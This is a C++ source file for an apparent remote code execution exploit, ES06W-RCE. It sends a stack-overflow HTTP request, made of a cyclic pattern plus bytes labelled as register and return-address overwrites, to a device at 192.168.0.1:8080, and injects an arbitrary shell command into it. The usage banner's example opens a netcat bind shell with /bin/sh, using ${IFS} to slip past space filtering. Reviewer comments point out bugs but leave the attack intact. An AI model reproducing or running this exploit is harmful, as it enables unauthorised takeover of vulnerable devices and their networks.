// ES06W-RCE.cpp :
//
void ShowHelp()
{
    // Usage banner, printed when the program is not given exactly one argument.
    fputs("[+]Usage: ES06W-RCE.exe [Command]\n"
          "[+]Example: ES06W-RCE.exe \"nc${IFS}-lp${IFS}4444${IFS}-e${IFS}/bin/sh\"\n",
          stdout);
}
// Entry point. Builds one HTTP GET request from a fixed template, splices
// argv[1] into it via the template's single "%s", sends it to the hard-coded
// address 192.168.0.1:8080 over a WinSock TCP connection, prints whatever comes
// back, and exits. Returns 0 on every path, including the WSAStartup failure.
int main(int argc, char **argv)
{
    WSADATA stcData = {};
    int int_ret = 0;
    char str_recv[0x1000] = {};          // response buffer, zero-filled once
    char str_payload_final[0x1000] = {}; // request after "%s" substitution
    // Exactly one argument is expected; anything else prints the usage text.
    if (argc != 2) {
        ShowHelp();
        return 0;
    }
    // WinSock 2.2 initialisation. NOTE(review): the failure path returns 0,
    // so a caller/script cannot distinguish it from a successful run.
    int_ret = WSAStartup(MAKEWORD(2, 2), &stcData);
    if (int_ret == SOCKET_ERROR) {
        printf("[-]Init Failed!\n");
        return 0;
    }
    // Request template. The path is a long cyclic pattern followed by raw
    // bytes that the author labels as register/return-address values, then the
    // "%s" slot that receives argv[1] unmodified, then fixed HTTP/1.1 headers.
    // The trailing "\0" is explicit; the array also gets the implicit terminator.
    char str_payload[] = {
        "GET /aaabacadaeafagahaiajakalamanaoapaqarasatauavawaxayazaAaBaCaDaEaFaGaHa"
        "IaJaKaLaMaNaOaPaQaRaSaTaUaVaWaXaYaZa0a1a2a3a4a5a6a7a8a9babbbcbdbebfbgbhbib"
        "jbkblbmbnbobpbqbrbsbtbubvbwbxbybzbAbBbCbDbEbFbGbHbIbJbKbLbMbNbObPbQbRbSbTb"
        "UbVbWbXbYbZb0b1b2b3b4b5b6b7b8b9cacbcccd"
        "\xBC\x5F\xCB\x48" // Control R7
        "\x94\x02\xD5\x48" // Return Addr
        "%s"               // Command
        " HTTP/1.1\r\n"
        "Host: 192.168.0.1:8080\r\n"
        "Connection: keep-alive\r\n"
        "Upgrade-Insecure-Requests: 1\r\n"
        "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36\r\n"
        "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\n"
        "Accept-Encoding: gzip, deflate\r\n"
        "Accept-Language: zh-CN,zh;q=0.9\r\n\r\n\0"
    };
    // str_payload is used as the format string; its only conversion is the
    // "%s" above. NOTE(review): the return value is discarded, so a too-long
    // argv[1] is not detected here; and the user-supplied text is not
    // validated or escaped before it is placed in the request line.
    sprintf_s(str_payload_final, 0x1000, str_payload, argv[1]);
    // Destination is fixed in code (same host/port as the Host: header).
    // NOTE(review): socket() result is not checked before use. sin_zero of
    // sock_addr is left uninitialised; only the three fields below are set.
    SOCKET sock_client = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    sockaddr_in sock_addr;
    sock_addr.sin_family = AF_INET;
    sock_addr.sin_port = htons(8080);
    sock_addr.sin_addr.S_un.S_addr = inet_addr("192.168.0.1");
    // NOTE(review): nErrCode is never used, and int_ret from connect() is never
    // examined, so send() below runs even if the connection failed.
    int nErrCode = 0;
    int_ret = connect(sock_client, (sockaddr *)&sock_addr, sizeof(sockaddr_in));
    // strlen() stops at the first NUL, so only the substituted request text up
    // to the explicit "\0" is transmitted. send()'s return value is ignored.
    send(sock_client, str_payload_final, strlen(str_payload_final), 0);
    // Short fixed delay, then a single recv(). NOTE(review): the byte count
    // returned by recv() is discarded; if the reply fills all 0x1000 bytes
    // there is no NUL terminator for the "%s" below, and a reply shorter than
    // the buffer is printed only because str_recv was zero-initialised.
    Sleep(20);
    recv(sock_client, str_recv, sizeof(str_recv), 0);
    printf("[-]Recv: %s\n", str_recv);
    printf("[+]Finished!\n");
    closesocket(sock_client);
    WSACleanup();
    // Unconditional success exit code.
    return 0;
}